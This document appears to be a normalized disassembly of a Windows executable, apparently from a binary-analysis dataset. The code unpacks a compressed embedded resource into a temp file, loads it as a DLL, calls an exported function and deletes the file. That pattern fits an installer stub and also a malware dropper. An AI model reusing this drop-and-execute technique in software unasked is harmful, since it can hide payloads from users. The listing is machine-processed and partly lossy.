sub_401000
push ebp
mov ebp esp
sub esp 0x418
push ebx
push esi
push edi
mov esi r--data
lea edi [ ebp - 0x418 ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
push 0x7e
movsw [ edi ] [ esi ]
pop ecx
xor eax eax
lea edi [ ebp - 0x40a ]
[ edi ]
stosw [ edi ]
mov ebx 0x104
push ebx
lea eax [ ebp - 0x418 ]
push eax
call [ DoEnvironmentSubstW@IAT ]
and [ ebp - 0x210 ] 0x0
xor eax eax
mov ecx 0x81
lea edi [ ebp - 0x20e ]
[ edi ]
stosw [ edi ]
lea eax [ ebp - 0x210 ]
push eax
lea eax [ ebp - 0x418 ]
push eax
mov [ ebp - 0x8 ] 0xfffffffd
call sub_401180
test al al
pop ecx
pop ecx
je r-xdata
lea eax [ ebp - 0x210 ]
push eax
push 0x0
push r--data
lea eax [ ebp - 0x418 ]
push eax
call [ GetTempFileNameW@IAT ]
lea eax [ ebp - 0x210 ]
push eax
mov [ ebp - 0x8 ] 0xfffffffd
call sub_40121d
test al al
pop ecx
mov [ ebp - 0x1 ] al
je r-xdata
lea esi [ ebp - 0x8 ]
lea edi [ ebp - 0x210 ]
call sub_401370
test al al
mov [ ebp - 0x1 ] al
jne r-xdata
lea eax [ ebp - 0x210 ]
push eax
call [ DeleteFileW@IAT ]
cmp [ ebp - 0x1 ] 0x0
jne r-xdata
lea esi [ ebp - 0x8 ]
lea edi [ ebp - 0x210 ]
call sub_401370
mov [ ebp - 0x1 ] al
push [ ebp - 0x8 ]
call [ ExitProcess@IAT ]
int3
xor eax eax
push eax
push ebx
lea ecx [ ebp - 0x418 ]
push ecx
push eax
push 0x70
push eax
push 0x1200
call [ FormatMessageW@IAT ]
test eax eax
je r-xdata
mov esi [ ebp - 0x210 ]
push ebx
lea eax [ ebp - 0x210 ]
push eax
push 0x0
call [ GetModuleFileNameW@IAT ]
lea eax [ ebp - 0x210 ]
push 0x5c
push eax
call sub_4014be
pop ecx
pop ecx
mov edi eax
test edi edi
push 0x2
pop ebx
je r-xdata
xor ax ax
lea ecx [ ebp - 0x418 ]
call sub_40149b
mov [ eax ] 0x28
add eax ebx
mov [ eax ] si
add eax ebx
mov [ eax ] 0x3a
add eax ebx
push 0x10
mov [ eax ] 0x29
and [ eax + 0x2 ] 0x0
push edi
lea eax [ ebp - 0x418 ]
push eax
push 0x0
call [ MessageBoxW@IAT ]
add edi ebx
sub_401180
push ebp
mov ebp esp
push ecx
push ebx
push edi
lea eax [ ebp - 0x4 ]
xor ebx ebx
push eax
mov [ ebp - 0x4 ] ebx
call [ GetCommandLineW@IAT ]
push eax
call [ CommandLineToArgvW@IAT ]
mov edi eax
cmp edi ebx
jne r-xdata
push esi
xor esi esi
inc esi
cmp [ ebp - 0x4 ] esi
jle r-xdata
xor al al
jmp r-xdata
push edi
call [ GlobalFree@IAT ]
mov al bl
pop esi
mov ecx [ edi + esi * 4 ]
mov edx r--data
call sub_401429
test eax eax
jne r-xdata
pop edi
pop ebx
leave
retn
inc esi
cmp esi [ ebp - 0x4 ]
jl r-xdata
lea eax [ esi + 0x1 ]
cmp eax [ ebp - 0x4 ]
jl r-xdata
jmp r-xdata
push [ ebp + 0xc ]
mov ecx [ ebp + 0x8 ]
call sub_40147c
pop ecx
mov ecx [ ebp + 0xc ]
xor ax ax
call sub_40149b
mov ecx eax
sub ecx [ ebp + 0xc ]
and ecx 0xfffffffe
cmp ecx 0x2
jle r-xdata
cmp [ eax - 0x2 ] 0x5c
je r-xdata
mov ecx [ edi + esi * 4 + 0x4 ]
push eax
call sub_40147c
pop ecx
mov bl 0x1
mov [ eax ] 0x5c
inc eax
inc eax
sub_40121d
push ebp
mov ebp esp
sub esp 0x1c
push ebx
push esi
push edi
push r--data
push 0x90
xor edi edi
push edi
call [ FindResourceW@IAT ]
mov esi eax
cmp esi edi
je r-xdata
xor al al
cmp esi 0xffffffff
je r-xdata
push esi
push edi
call [ LoadResource@IAT ]
mov ebx eax
cmp ebx edi
je r-xdata
push esi
push edi
call [ SizeofResource@IAT ]
cmp eax edi
mov [ ebp - 0x8 ] eax
jbe r-xdata
push ebx
call [ LockResource@IAT ]
mov esi eax
cmp esi edi
je r-xdata
push edi
push 0x80
push 0x2
push edi
push edi
push 0x40000000
push [ ebp + 0x8 ]
call [ CreateFileW@IAT ]
cmp eax edi
mov [ ebp - 0xc ] eax
je r-xdata
cmp eax 0xffffffff
je r-xdata
mov [ ebp - 0x4 ] edi
xor ecx ecx
lea eax [ esi + 0x5 ]
movzx edx [ eax ]
shl edx cl
add ecx 0x8
add [ ebp - 0x4 ] edx
inc eax
cmp ecx 0x40
jb r-xdata
push [ ebp - 0x4 ]
call sub_4013f3
mov ebx eax
cmp ebx edi
pop ecx
jne r-xdata
mov eax [ ebp - 0x8 ]
add eax 0xfffffff3
mov [ ebp - 0x10 ] eax
lea eax [ ebp - 0x1c ]
push eax
lea eax [ ebp - 0x14 ]
push eax
push 0x1
push 0x5
push esi
lea eax [ ebp - 0x10 ]
push eax
add esi 0xd
push esi
lea eax [ ebp - 0x4 ]
push eax
push ebx
mov [ ebp - 0x1c ] sub_40135a
mov [ ebp - 0x18 ] sub_401365
call sub_402c41
mov esi eax
add esp 0x24
cmp esi edi
jne r-xdata
push 0x2
pop esi
jmp r-xdata
push ebx
call sub_40140e
pop ecx
push edi
lea eax [ ebp - 0x8 ]
push eax
push [ ebp - 0x4 ]
mov [ ebp - 0x8 ] edi
push ebx
push [ ebp - 0xc ]
call [ WriteFile@IAT ]
mov eax [ ebp - 0x8 ]
cmp eax [ ebp - 0x4 ]
je r-xdata
push [ ebp - 0xc ]
call [ CloseHandle@IAT ]
xor eax eax
cmp esi edi
sete al
jmp r-xdata
pop edi
pop esi
pop ebx
leave
retn
push 0x9
pop esi
sub_401370
push ebp
mov ebp esp
sub esp 0x10
push edi
mov [ ebp - 0x1 ] 0x0
mov [ esi ] 0xfffffffe
call [ LoadLibraryW@IAT ]
test eax eax
mov [ ebp - 0x8 ] eax
je r-xdata
mov al [ ebp - 0x1 ]
leave
retn
or [ esi ] 0xffffffff
push ebx
push r--data
push eax
call [ GetProcAddress@IAT ]
mov ebx eax
test ebx ebx
je r-xdata
push [ ebp - 0x8 ]
call [ FreeLibrary@IAT ]
pop ebx
lea eax [ ebp - 0x10 ]
push eax
push 0x0
mov [ ebp - 0x10 ] r--data
mov [ ebp - 0xc ] edi
call [ GetModuleHandleW@IAT ]
push eax
call ebx
mov [ esi ] eax
mov [ ebp - 0x1 ] 0x1
sub_4013d8
push esi
mov esi [ ecx + 0x4 ]
push 0x5c
push esi
call sub_4014be
test eax eax
pop ecx
pop ecx
je r-xdata
mov eax esi
pop esi
retn
add eax 0x2
pop esi
retn
sub_401429
mov ax [ ecx ]
test ax ax
push esi
je r-xdata
cmp [ edx ] 0x0
jne r-xdata
mov si [ edx ]
test si si
je r-xdata
xor ecx ecx
test ax ax
setne cl
pop esi
lea ecx [ ecx + ecx - 0x1 ]
mov eax ecx
retn
xor eax eax
pop esi
retn
mov ax [ ecx ]
test ax ax
jne r-xdata
movzx esi si
movzx eax ax
sub eax esi
jne r-xdata
movzx eax [ ecx ]
movzx ecx [ edx ]
sub eax ecx
pop esi
retn
inc ecx
inc ecx
mov ax [ ecx ]
inc edx
inc edx
test ax ax
jne r-xdata
sub_40147c
mov edx [ esp + 0x4 ]
jmp r-xdata
mov ax [ ecx ]
test ax ax
jne r-xdata
inc ecx
mov [ edx ] ax
inc ecx
inc edx
inc edx
xor eax eax
and [ edx ] ax
mov eax [ esp + 0x4 ]
retn
sub_40149b
mov edx ecx
movzx ecx [ ecx ]
jmp r-xdata
test cx cx
jne r-xdata
cmp cx ax
je r-xdata
neg ax
sbb eax eax
not eax
and eax edx
retn
mov eax edx
retn
inc edx
inc edx
mov cx [ edx ]
sub_4014be
mov ecx [ esp + 0x4 ]
xor ax ax
call sub_40149b
jmp r-xdata
cmp eax [ esp + 0x4 ]
ja r-xdata
lea ecx [ eax - 0x2 ]
mov dx [ ecx ]
cmp dx [ esp + 0x8 ]
je r-xdata
xor eax eax
retn
add eax 0xfffffffe
retn
mov eax ecx
sub_401506
push ebp
mov ebp esp
sub esp 0x58
mov eax [ edx + 0x10 ]
mov [ ebp - 0x1c ] eax
mov eax [ edx + 0x34 ]
mov ecx [ edx + 0x8 ]
mov [ ebp - 0xc ] eax
mov eax [ edx + 0x38 ]
mov [ ebp - 0x24 ] eax
mov eax [ edx + 0x3c ]
mov [ ebp - 0x34 ] eax
mov eax [ edx + 0x40 ]
mov [ ebp - 0x38 ] eax
mov eax [ edx + 0x44 ]
mov [ ebp - 0x44 ] eax
xor eax eax
inc eax
push ebx
push esi
push edi
mov edi eax
shl edi cl
mov ecx [ edx + 0x4 ]
shl eax cl
mov ebx [ edx + 0x18 ]
mov esi [ edx + 0x1c ]
dec edi
dec eax
and [ ebp - 0x28 ] 0x0
mov [ ebp - 0x54 ] eax
mov eax [ edx ]
mov [ ebp - 0x4c ] eax
mov eax [ edx + 0x14 ]
mov [ ebp - 0x3c ] eax
mov eax [ edx + 0x28 ]
mov [ ebp - 0x30 ] eax
mov eax [ edx + 0x24 ]
mov [ ebp - 0x14 ] eax
mov eax [ edx + 0x2c ]
mov [ ebp - 0x20 ] eax
mov eax [ edx + 0x30 ]
mov [ ebp - 0x40 ] eax
mov eax [ edx + 0x20 ]
mov [ ebp - 0x58 ] edi
mov [ ebp - 0x8 ] ebx
mov [ ebp - 0x4 ] eax
mov ebx esi
shr ebx 0xb
imul ebx ecx
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
mov edi [ ebp - 0x10 ]
sub [ ebp - 0x4 ] ebx
mov edi ecx
shr edi 0x5
sub ecx edi
mov edi [ ebp - 0x10 ]
mov [ edi ] cx
mov ecx [ ebp - 0xc ]
mov edi [ ebp - 0x1c ]
sub esi ebx
cmp esi 0x1000000
lea edi [ edi + ecx * 2 + 0x180 ]
movzx ecx [ edi ]
mov [ ebp - 0x10 ] edi
jae r-xdata
mov eax 0x800
sub eax ecx
mov esi ebx
mov ebx [ ebp - 0x1c ]
shr eax 0x5
add eax ecx
add ebx 0xe6c
cmp [ ebp - 0x40 ] 0x0
mov [ edi ] ax
mov [ ebp - 0x10 ] ebx
jne r-xdata
mov ebx esi
shr ebx 0xb
imul ebx ecx
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
mov edi [ ebp - 0x10 ]
mov eax [ ebp - 0x14 ]
test eax eax
jne r-xdata
cmp [ ebp - 0x20 ] 0x0
je r-xdata
sub [ ebp - 0x4 ] ebx
mov edi ecx
shr edi 0x5
sub ecx edi
mov edi [ ebp - 0x10 ]
sub esi ebx
cmp [ ebp - 0x40 ] 0x0
mov [ edi ] cx
jne r-xdata
add [ ebp - 0xc ] 0xc
mov esi ebx
mov ebx 0x800
sub ebx ecx
shr ebx 0x5
add ebx ecx
mov ecx [ ebp - 0x1c ]
mov [ edi ] bx
add ecx 0x664
jmp r-xdata
mov ecx [ ebp - 0x3c ]
movzx edi [ eax + ecx - 0x1 ]
mov eax [ ebp - 0x20 ]
and eax [ ebp - 0x54 ]
xor ecx ecx
mov cl 0x8
sub cl [ ebp - 0x4c ]
shr edi cl
mov ecx [ ebp - 0x4c ]
shl eax cl
add edi eax
lea eax [ edi + edi * 2 ]
shl eax 0x9
add ebx eax
mov [ ebp - 0x10 ] ebx
mov eax [ ebp - 0x30 ]
cmp [ ebp - 0xc ] 0x7
jae r-xdata
cmp esi 0x1000000
mov ecx [ ebp - 0xc ]
mov edi [ ebp - 0x1c ]
lea ecx [ edi + ecx * 2 + 0x198 ]
mov [ ebp - 0x10 ] ecx
movzx ecx [ ecx ]
jae r-xdata
cmp [ ebp - 0x20 ] 0x0
je r-xdata
cmp esi 0x1000000
movzx edi [ ecx ]
mov [ ebp - 0x18 ] edi
jae r-xdata
mov eax [ ebp - 0x14 ]
cmp eax [ ebp - 0x24 ]
mov [ ebp - 0x2c ] 0x100
sbb ecx ecx
and ecx [ ebp - 0x30 ]
sub ecx [ ebp - 0x24 ]
add ecx [ edx + 0x14 ]
cmp [ ebp - 0xc ] 0xa
movzx eax [ ecx + eax ]
mov [ ebp - 0x48 ] eax
sbb eax eax
and eax 0xfffffffd
add eax 0x6
sub [ ebp - 0xc ] eax
xor ecx ecx
inc ecx
jmp r-xdata
cmp [ ebp - 0xc ] 0x4
jae r-xdata
mov edi esi
shr edi 0xb
imul edi ecx
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
xor eax eax
inc eax
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi [ ebp - 0x18 ]
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
shl [ ebp - 0x48 ] 0x1
mov edi [ ebp - 0x2c ]
and edi [ ebp - 0x48 ]
mov eax [ ebp - 0x2c ]
add eax edi
add eax ecx
cmp esi 0x1000000
lea ebx [ ebx + eax * 2 ]
movzx eax [ ebx ]
mov [ ebp - 0x50 ] ebx
mov [ ebp - 0x18 ] eax
jae r-xdata
push 0x3
pop eax
mov eax [ ebp - 0xc ]
jmp r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi ecx
shr edi 0x5
sub ecx edi
cmp esi 0x1000000
mov edi [ ebp - 0x10 ]
mov [ edi ] cx
mov ecx [ ebp - 0xc ]
mov edi [ ebp - 0x1c ]
lea edi [ edi + ecx * 2 + 0x1b0 ]
movzx ecx [ edi ]
mov [ ebp - 0x10 ] edi
jae r-xdata
mov ebx 0x800
sub ebx ecx
shr ebx 0x5
add ebx ecx
mov ecx [ ebp - 0x10 ]
mov [ ecx ] bx
mov ecx [ ebp - 0xc ]
mov ebx [ ebp - 0x1c ]
add ecx 0xf
shl ecx 0x4
add ecx eax
cmp edi 0x1000000
lea ecx [ ebx + ecx * 2 ]
movzx ebx [ ecx ]
mov esi edi
mov [ ebp - 0x18 ] ebx
jae r-xdata
pop edi
pop esi
pop ebx
leave
retn 0x8
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi [ ebp - 0x18 ]
mov ebx edi
shr ebx 0x5
sub edi ebx
cmp esi 0x1000000
mov [ ecx ] di
movzx edi [ ecx + 0x2 ]
jae r-xdata
mov esi edi
mov edi 0x800
sub edi [ ebp - 0x18 ]
shl eax 0x4
shr edi 0x5
add edi [ ebp - 0x18 ]
and [ ebp - 0x2c ] 0x0
mov [ ecx ] di
lea ecx [ eax + ecx + 0x4 ]
mov [ ebp - 0x28 ] 0x8
jmp r-xdata
mov eax esi
shr eax 0xb
imul eax [ ebp - 0x18 ]
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov eax [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl eax 0x8
or eax ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] eax
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
mov ebx [ ebp - 0x10 ]
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
sub [ ebp - 0xc ] eax
xor ecx ecx
inc ecx
mov ebx esi
shr ebx 0xb
imul ebx ecx
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
mov edi [ ebp - 0x10 ]
mov edi esi
shr edi 0xb
imul edi [ ebp - 0x18 ]
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
movzx ebx [ ebx ]
shl edi 0x8
mov esi edi
mov edi [ ebp - 0x4 ]
shl edi 0x8
or edi ebx
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
mov ebx esi
shr ebx 0xb
imul ebx edi
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov eax [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl eax 0x8
or eax ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] eax
mov eax [ ebp - 0x50 ]
xor edi edi
inc edi
sub [ ebp - 0x4 ] eax
sub esi eax
mov eax [ ebp - 0x18 ]
mov ebx eax
shr ebx 0x5
sub eax ebx
lea ecx [ ecx + ecx + 0x1 ]
mov esi eax
mov eax 0x800
sub eax [ ebp - 0x18 ]
not edi
shr eax 0x5
add eax [ ebp - 0x18 ]
add ecx ecx
jmp r-xdata
sub [ ebp - 0x4 ] edi
mov ebx [ ebp - 0x10 ]
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov [ ecx + ebx ] ax
inc ecx
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ecx + ebx ] di
jmp r-xdata
sub [ ebp - 0x4 ] ebx
mov edi ecx
shr edi 0x5
sub ecx edi
mov edi [ ebp - 0x10 ]
mov [ edi ] cx
mov ecx [ ebp - 0xc ]
mov edi [ ebp - 0x1c ]
sub esi ebx
cmp esi 0x1000000
lea edi [ edi + ecx * 2 + 0x1c8 ]
movzx ecx [ edi ]
mov [ ebp - 0x10 ] edi
jae r-xdata
mov esi ebx
mov ebx 0x800
sub ebx ecx
shr ebx 0x5
add ebx ecx
mov ecx [ ebp - 0x34 ]
mov [ edi ] bx
jmp r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi [ ebp - 0x18 ]
mov ebx edi
shr ebx 0x5
sub edi ebx
mov [ ecx ] di
jmp r-xdata
mov eax 0x800
sub eax [ ebp - 0x18 ]
mov esi edi
mov edi [ ebp - 0x14 ]
shr eax 0x5
add eax [ ebp - 0x18 ]
cmp edi [ ebp - 0x24 ]
mov [ ecx ] ax
mov eax [ ebp - 0x3c ]
sbb ecx ecx
and ecx [ ebp - 0x30 ]
sub ecx [ ebp - 0x24 ]
add ecx edi
mov cl [ ecx + eax ]
mov [ edi + eax ] cl
inc edi
inc [ ebp - 0x20 ]
cmp [ ebp - 0xc ] 0x7
mov [ ebp - 0x14 ] edi
sbb eax eax
and eax 0xfffffffe
add eax 0xb
mov [ ebp - 0xc ] eax
jmp r-xdata
sub [ ebp - 0x4 ] ebx
mov eax edi
shr eax 0x5
sub edi eax
sub esi ebx
mov [ ecx + 0x2 ] di
add ecx 0x204
mov [ ebp - 0x2c ] 0x10
mov [ ebp - 0x28 ] 0x100
mov esi ebx
mov ebx 0x800
sub ebx edi
shr ebx 0x5
add ebx edi
shl eax 0x4
mov [ ecx + 0x2 ] bx
push 0x8
lea ecx [ eax + ecx + 0x104 ]
pop eax
mov [ ebp - 0x2c ] eax
mov [ ebp - 0x28 ] eax
jmp r-xdata
mov ebx esi
shr ebx 0xb
imul ebx edi
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov eax [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl eax 0x8
or eax ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] eax
mov eax [ ebp - 0x50 ]
mov ebx [ ebp - 0x10 ]
mov edi [ ebp - 0x14 ]
mov eax [ ebp - 0x3c ]
inc [ ebp - 0x14 ]
inc [ ebp - 0x20 ]
mov [ edi + eax ] cl
jmp r-xdata
mov ebx [ ebp - 0x50 ]
and [ ebp - 0x2c ] edi
cmp ecx 0x100
mov [ ebx ] ax
jb r-xdata
add ecx ecx
cmp esi 0x1000000
movzx eax [ ecx + ebx ]
jae r-xdata
jmp r-xdata
cmp ecx 0x100
jb r-xdata
mov ebx esi
shr ebx 0xb
imul ebx ecx
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
mov edi [ ebp - 0x10 ]
mov edi [ ebp - 0x24 ]
mov [ ebp - 0x34 ] edi
mov [ ebp - 0x24 ] ecx
cmp [ ebp - 0xc ] 0x7
sbb ecx ecx
and ecx 0xfffffffd
add ecx 0xb
mov [ ebp - 0xc ] ecx
mov ecx [ ebp - 0x1c ]
add ecx 0xa68
mov eax [ ebp - 0x14 ]
cmp eax [ ebp + 0x8 ]
jae r-xdata
sub [ ebp - 0x4 ] ebx
mov eax edi
shr eax 0x5
sub esi ebx
sub edi eax
mov eax [ ebp - 0x50 ]
mov [ eax + ecx ] di
lea edi [ eax + 0x1 ]
mov esi ebx
mov ebx 0x800
sub ebx edi
shr ebx 0x5
add ebx edi
mov [ eax + ecx ] bx
mov edi eax
jmp r-xdata
sub [ ebp - 0x4 ] ebx
mov edi ecx
shr edi 0x5
sub esi ebx
sub ecx edi
mov edi [ ebp - 0x10 ]
mov [ edi ] cx
mov edi [ ebp - 0x38 ]
mov ecx [ ebp - 0x44 ]
mov [ ebp - 0x44 ] edi
mov esi ebx
mov ebx 0x800
sub ebx ecx
shr ebx 0x5
add ebx ecx
mov ecx [ ebp - 0x38 ]
mov [ edi ] bx
jmp r-xdata
cmp esi 0x1000000
mov eax [ ebp - 0x8 ]
jae r-xdata
mov ebx [ ebp - 0x8 ]
cmp ebx [ ebp + 0xc ]
jae r-xdata
cmp esi 0x1000000
lea eax [ edi + edi ]
movzx edi [ eax + ecx ]
mov [ ebp - 0x50 ] eax
jae r-xdata
sub eax [ ebp - 0x28 ]
add edi eax
cmp [ ebp - 0xc ] 0xc
mov [ ebp - 0x28 ] edi
jb r-xdata
cmp edi [ ebp - 0x28 ]
mov eax [ ebp - 0x2c ]
jb r-xdata
mov edi [ ebp - 0x34 ]
mov [ ebp - 0x38 ] edi
mov [ edx + 0x18 ] eax
mov eax [ ebp - 0x4 ]
mov [ edx + 0x20 ] eax
mov eax [ ebp - 0x28 ]
mov [ edx + 0x48 ] eax
mov eax [ ebp - 0x14 ]
mov [ edx + 0x24 ] eax
mov eax [ ebp - 0x20 ]
mov [ edx + 0x2c ] eax
mov eax [ ebp - 0x24 ]
mov [ edx + 0x38 ] eax
mov eax [ ebp - 0x34 ]
mov [ edx + 0x3c ] eax
mov eax [ ebp - 0x38 ]
mov [ edx + 0x40 ] eax
mov eax [ ebp - 0x44 ]
mov [ edx + 0x44 ] eax
mov eax [ ebp - 0xc ]
mov [ edx + 0x34 ] eax
mov [ edx + 0x1c ] esi
xor eax eax
mov ecx [ ebp - 0x4 ]
movzx edi [ eax ]
shl ecx 0x8
or ecx edi
shl esi 0x8
mov [ ebp - 0x4 ] ecx
inc eax
mov edi [ ebp - 0x58 ]
jmp r-xdata
mov eax [ ebp + 0x8 ]
mov ecx [ ebp - 0x14 ]
inc edi
inc edi
cmp eax ecx
je r-xdata
cmp edi 0x4
jae r-xdata
mov eax [ ebp - 0x20 ]
mov ecx [ ebp - 0xc ]
and eax edi
mov edi [ ebp - 0x1c ]
shl ecx 0x4
add ecx eax
cmp esi 0x1000000
lea edi [ edi + ecx * 2 ]
movzx ecx [ edi ]
mov [ ebp - 0x50 ] eax
mov [ ebp - 0x10 ] edi
jae r-xdata
sub eax ecx
cmp eax edi
jb r-xdata
push 0x3
pop ecx
mov ecx edi
jmp r-xdata
cmp ecx [ ebp - 0x24 ]
mov [ ebp - 0x48 ] eax
sbb ecx ecx
and ecx [ ebp - 0x30 ]
add [ ebp - 0x20 ] eax
sub ecx [ ebp - 0x24 ]
sub edi eax
add ecx [ ebp - 0x14 ]
mov [ ebp - 0x28 ] edi
lea edi [ ecx + eax ]
cmp edi [ ebp - 0x30 ]
mov edi [ ebp - 0x3c ]
ja r-xdata
mov eax edi
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
mov eax [ ebp - 0x1c ]
shl ecx 0x7
cmp esi 0x1000000
lea ecx [ ecx + eax + 0x360 ]
movzx eax [ ecx + 0x2 ]
jae r-xdata
mov ebx [ ebp - 0x14 ]
mov al [ ecx + edi ]
inc [ ebp - 0x14 ]
inc ecx
cmp ecx [ ebp - 0x30 ]
mov [ ebx + edi ] al
jne r-xdata
mov ebx [ ebp - 0x14 ]
sub ecx ebx
add edi ebx
add [ ebp - 0x14 ] eax
mov [ ebp - 0x50 ] ecx
lea ebx [ edi + eax ]
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov [ ecx + 0x2 ] ax
push 0x3
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ecx + 0x2 ] di
push 0x2
jmp r-xdata
dec [ ebp - 0x48 ]
jne r-xdata
xor ecx ecx
mov eax [ ebp - 0x50 ]
mov al [ eax + edi ]
mov [ edi ] al
inc edi
cmp edi ebx
jne r-xdata
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
mov ebx [ ebp - 0x18 ]
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
cmp esi 0x1000000
pop eax
lea ebx [ eax + eax ]
movzx eax [ ebx + ecx ]
mov [ ebp - 0x18 ] ebx
jae r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov edi [ ebp - 0x18 ]
mov [ edi + ecx ] ax
inc edi
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ebx + ecx ] di
mov edi ebx
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
mov ebx [ ebp - 0x18 ]
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
cmp esi 0x1000000
lea ebx [ edi + edi ]
movzx eax [ ebx + ecx ]
mov [ ebp - 0x18 ] ebx
jae r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov edi [ ebp - 0x18 ]
mov [ edi + ecx ] ax
inc edi
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ebx + ecx ] di
mov edi ebx
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
mov ebx [ ebp - 0x18 ]
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
cmp esi 0x1000000
lea ebx [ edi + edi ]
movzx eax [ ebx + ecx ]
mov [ ebp - 0x18 ] ebx
jae r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov edi [ ebp - 0x18 ]
mov [ edi + ecx ] ax
inc edi
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ebx + ecx ] di
mov edi ebx
jmp r-xdata
mov ebx esi
shr ebx 0xb
imul ebx eax
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
mov edi [ ebp - 0x18 ]
add edi edi
cmp esi 0x1000000
movzx eax [ edi + ecx ]
mov [ ebp - 0x18 ] edi
jae r-xdata
sub [ ebp - 0x4 ] ebx
mov edi eax
shr edi 0x5
sub eax edi
mov edi [ ebp - 0x18 ]
sub esi ebx
mov [ edi + ecx ] ax
inc edi
mov esi ebx
mov ebx 0x800
sub ebx eax
shr ebx 0x5
add ebx eax
mov [ edi + ecx ] bx
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
mov ebx [ ebp - 0x18 ]
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
lea ebx [ edi + edi ]
add ecx ebx
cmp esi 0x1000000
movzx eax [ ecx ]
mov [ ebp - 0x18 ] ebx
jae r-xdata
